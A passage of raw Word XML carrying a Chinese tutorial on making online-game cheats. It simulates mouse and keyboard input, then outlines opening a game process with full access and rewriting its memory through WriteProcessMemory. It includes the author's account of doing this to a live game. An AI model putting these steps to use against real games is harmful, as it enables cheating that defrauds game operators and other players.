        <w:t>MOUSEEVENTF_LEFTUP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，具体的东东还是查一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好了，有了前面的知识，我们就可以来看看人物移走是怎么实现的了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>getcursorpos(point);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是个自制的随机坐标函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">setcursorpos(point.x,point.y); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　看了以上的代码，是不是觉得人物的游走很简单啦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，举一仿三，还有好多好东东可以用这个技巧实现（我早就说过，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TMD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是垃圾外挂的做法，相信了吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），接下来，再看看游戏里面自动攻击的做法吧（必需游戏中攻击支持快捷键的），道理还是一样的，只是用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同罢了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这回我们要用到的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，其用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>VOID keybd_event(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>BYTE bVk, // virtual-key code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>BYTE bScan, // hardware scan code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dwFlags, // flags specifying various function options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dwExtraInfo // additional data associated with keystroke</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　我们还要知道扫描码不可以直接使用，要用函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MapVirtualKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把键值转成扫描码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MapVirtualKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的具体使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>UINT MapVirtualKey(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>UINT uCode, // virtual-key code or scan code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>UINT uMapType // translation to perform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　好了，比说此快接键是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTRL+A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，接下来让我们看看实际代码是怎么写的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>keybd_event(65,mapvirtualkey(65,0),0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先模拟按下了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTRL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，再模拟按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，再模拟放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，最后放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CTRL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，这就是一个模拟按快捷键的周期。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　（看到这里，差不多对简易外挂有了一定的了解了吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>试试？如果你举一仿三还能有更好的东东出来，这就要看你的领悟能力了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不过不要高兴太早这只是才开始，以后还有更复杂的东东等着你呢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　本地修改式外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　现在我们来看看，比动作式外挂更进一步的外挂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地修改式外挂的整个制作过程进行一个详细的分解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　具我所知，本地修改式外挂最典型的应用就是在“精灵”游戏上面，因为我在近一年前（“精灵”还在测试阶段），我所在的公司里有很多同事玩“精灵”，于是我看了一下游戏的数据处理方式，发现它所发送到服务器上的信息是存在于内存当中（我看后第一个感受是：修改这种游戏和修改单机版的游戏没有多大分别，换句话说就是在他向服务器提交信息之前修改了内存地址就可以了），当时我找到了地址于是修改了内存地址，果然，按我的想法修改了地址，让系统自动提交后，果然成功了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，后来“精灵”又改成了双地址校检，内存校检等等，在这里我就不废话了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们就来看看这类外挂是如何制作的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在做外挂之前我们要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内存有个具体的认识，而在这里我们所指的内存是指系统的内存偏移量，也就是相对内存，而我们所要对其进行修改，那么我们要对几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行了解，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，跟着例子让我们看清楚这种外挂的制作和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用（为了保证网络游戏的正常运行，我就不把找内存地址的方法详细解说了）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、首先我们要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindWindow,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>知道游戏窗口的句柄，因为我们要通过它来得知游戏的运行后所在进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下面就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HWND FindWindow(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LPCTSTR lpClassName, // pointer to class name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LPCTSTR lpWindowName // pointer to window name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetWindowThreadProcessId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来得到游戏窗口相对应进程的进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，函数用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD GetWindowThreadProcessId(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HWND hWnd, // handle of window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LPDWORD lpdwProcessId // address of variable for process identifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、得到游戏进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，接下来的事是要以最高权限打开进程，所用到的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OpenProcess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的具体使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HANDLE OpenProcess(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">DWORD dwDesiredAccess, // access flag </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">BOOL bInheritHandle, // handle inheritance flag </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">DWORD dwProcessId // process identifier </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dwDesiredAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之处就是设存取方式的地方，它可设的权限很多，我们在这里使用只要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PROCESS_ALL_ACCESS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来打开进程就可以，其他的方式我们可以查一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、打开进程后，我们就可以用函数对存内进行操作，在这里我们只要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteProcessMemory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来对内存地址写入数据即可（其他的操作方式比如说：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadProcessMemory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，我在这里就不一一介绍了），我们看一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteProcessMemory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>BOOL WriteProcessMemory(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">HANDLE hProcess, // handle to process whose memory is written to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LPVOID lpBaseAddress, // address to start writing to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LPVOID lpBuffer, // pointer to buffer to write data to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD nSize, // number of bytes to write</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">LPDWORD lpNumberOfBytesWritten // actual number of bytes written </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
